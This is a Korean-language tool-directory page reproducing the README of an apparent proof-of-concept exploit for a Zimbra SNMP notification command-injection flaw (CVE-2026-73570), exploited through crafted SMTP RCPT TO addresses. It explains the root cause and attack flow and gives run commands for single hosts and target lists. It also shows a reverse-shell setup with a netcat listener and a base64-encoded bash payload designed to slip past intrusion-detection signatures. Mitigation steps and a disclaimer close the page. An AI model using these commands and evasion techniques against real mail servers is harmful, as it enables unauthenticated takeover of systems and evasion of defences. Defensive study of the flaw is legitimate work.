Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
도구/GitHubGitHub/gabrielunknown/cve-2026-73570
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingRed TeamingRemote Access Tool
GitHubgabrielunknown/cve-2026-73570

CVE-2026-73570

Zimbra SNMP 알림 OS 명령 주입 — SMTP 익스플로잇을 통한 인증 없는 RCE (PoC)

저장소 보기
11일 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

CVE-2026-73570 — Zimbra ZCS SNMP 알림 RCE 익스플로잇(PoC)

Zimbra Collaboration Suite SNMP 알림 핸들러의 OS 명령 주입을 통한 인증되지 않은 원격 코드 실행.


개요

필드값
CVECVE-2026-73570
CVSS 3.18.9 HIGH — AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:L
CWECWE-78 — OS 명령에 사용되는 특수 요소의 부적절한 중화
영향Zimbra ZCS < 10.1.20(zimbra-snmp 설치 시)
수정 버전ZCS 10.1.20 — 2026년 7월
CISA KEV2026-08-21 추가(FCEB 패치 기한: 2026-08-24)
인증 필요없음
실행 권한zimbra OS 사용자

근본 원인

선택적 zimbra-snmp 패키지에는 다음 패턴과 일치하는 /var/log/zimbra.log의 줄을 추적하는 swatchdog 규칙이 포함되어 있습니다:

root@kitploit:~
Service status change: <NAME> changed from <STATE> to <STATE>

일치 항목이 발견되면 swatchdog는 캡처된 <NAME> 필드를 어떠한 검증 없이 SNMP 알림 셸 스크립트에 직접 전달합니다.

인증되지 않은 공격자는 특수하게 구성된 SMTP RCPT TO 명령을 전송하여 조작된 로그 항목을 주입할 수 있습니다. RFC 5321 따옴표 처리된 로컬 파트를 사용하여 $(...)와 같은 셸 메타문자가 <NAME> 내부에 포함되며, swatchdog가 결과 로그 줄을 처리할 때 실행됩니다.


사전 조건

취약점이 악용 가능하려면 대상에서 다음 세 가지 조건이 모두 충족되어야 합니다:

  • zimbra-snmp 패키지가 설치되어 있음
  • SNMP 알림이 활성화되어 있음(snmp_notify = true)
  • swatchdog 서비스가 실행 중

공격 흐름

root@kitploit:~
공격자                          Zimbra MTA
   │                                  │
   │── TCP connect :25/:465/:587 ────►│
   │── EHLO mx-test.invalid ─────────►│
   │── MAIL FROM:<scanner@...> ──────►│
   │── RCPT TO:<"x: Service status    │
   │     change: localhost $(CMD)     │
   │     changed from stopped to      │
   │     running"@cve.invalid> ──────►│
   │                                  │── RCPT TO 데이터 기록 ──► /var/log/zimbra.log
   │                                  │                               │
   │                                  │                         swatchdog 패턴 일치,
   │                                  │                         $(CMD) 추출, 실행
   │◄─────────── 셸 콜백 ───────────────────────────────────────┘
  1. 포트 25 / 465 / 587에 연결합니다.
  2. 무기화된 RCPT TO로 표준 SMTP 대화를 전송합니다.
  3. Zimbra는 수락/거부 여부와 관계없이 주소 데이터를 기록합니다.
  4. swatchdog가 로그 패턴을 일치시키고 주입된 $(CMD)를 추출합니다.
  5. SNMP 핸들러가 zimbra OS 사용자로 CMD를 실행합니다.

익스플로잇

요구 사항

root@kitploit:~
cpan IO::Socket::SSL MIME::Base64 Digest::HMAC_MD5

단일 대상

root@kitploit:~
perl zimbra-poc.pl -H mail.target.com -r <YOUR_IP> -R 4444

대상 목록

root@kitploit:~
perl zimbra-poc.pl -f targets.txt -r <YOUR_IP> -R 4444

targets.txt — 한 줄에 호스트 하나, 선택적으로 :port, #로 시작하는 줄은 무시됩니다:

root@kitploit:~
mail.example.com
mail.example.com:25
10.0.0.50:587
# ignored comment

모든 옵션

플래그긴 옵션기본값설명
-H--host—단일 대상 호스트명 또는 IP
-f--file—대상 목록이 포함된 파일
-p--port587기본 SMTP 포트
-r--rhost—리버스 셸 콜백용 IP
-R--rport4444리스너 포트
-t--timeout15소켓 타임아웃(초)
-S--ssloff직접 TLS(포트 465에서 자동 활성화)
-v--verboseoff전체 SMTP 대화 출력
-L--logfile—세션 로그를 파일에 기록
-h--help—도움말 표시

전체 예시

root@kitploit:~
# 터미널 1 — 리스너 시작
nc -lvnp 4444

# 터미널 2 — 익스플로잇 실행
perl zimbra-poc.pl -H mail.target.com -r 10.10.10.1 -R 4444 -v

페이로드 기법

리버스 셸 명령은 주입 전에 base64로 인코딩됩니다:

root@kitploit:~
echo <b64>|base64 -d|bash

이렇게 하면 IDS/IPS가 /dev/tcp, bash -i, nc -e와 같은 평문 시그니처를 탐지하지 못합니다. 인코딩된 블롭은 RCPT TO의 따옴표 처리된 로컬 파트 내부에 $(...)로 주입되며, swatchdog가 로그 항목을 처리할 때 서버 측에서 실행이 트리거됩니다.


완화 조치

조치세부 사항
패치Zimbra ZCS ≥ 10.1.20으로 업그레이드
SNMP 알림 비활성화zmprov mcf zimbraSnmpNotifyEnabled FALSE && zmconfigdctl restart
패키지 제거apt remove zimbra-snmp / yum remove zimbra-snmp
네트워크 제어운영상 가능한 경우 인바운드 SMTP(25/465/587)를 신뢰할 수 있는 릴레이로 제한

참고 자료

  • NVD — CVE-2026-73570
  • Zimbra 보안 권고
  • CISA 알려진 악용 취약점 — CVE-2026-73570
  • CERT.pl 권고
  • BiuTrap/CVE-2026-73570

면책 조항

이 개념 증명은 승인된 보안 테스트, 학술 연구 및 방어 목적으로만 공개되었습니다.
소유하지 않았거나 명시적인 서면 허가 없이 테스트할 권한이 없는 시스템에 대해 실행하는 것은 불법입니다.
저자는 이 도구로 인한 오용이나 피해에 대해 어떠한 책임도 지지 않습니다.


도구 다운로드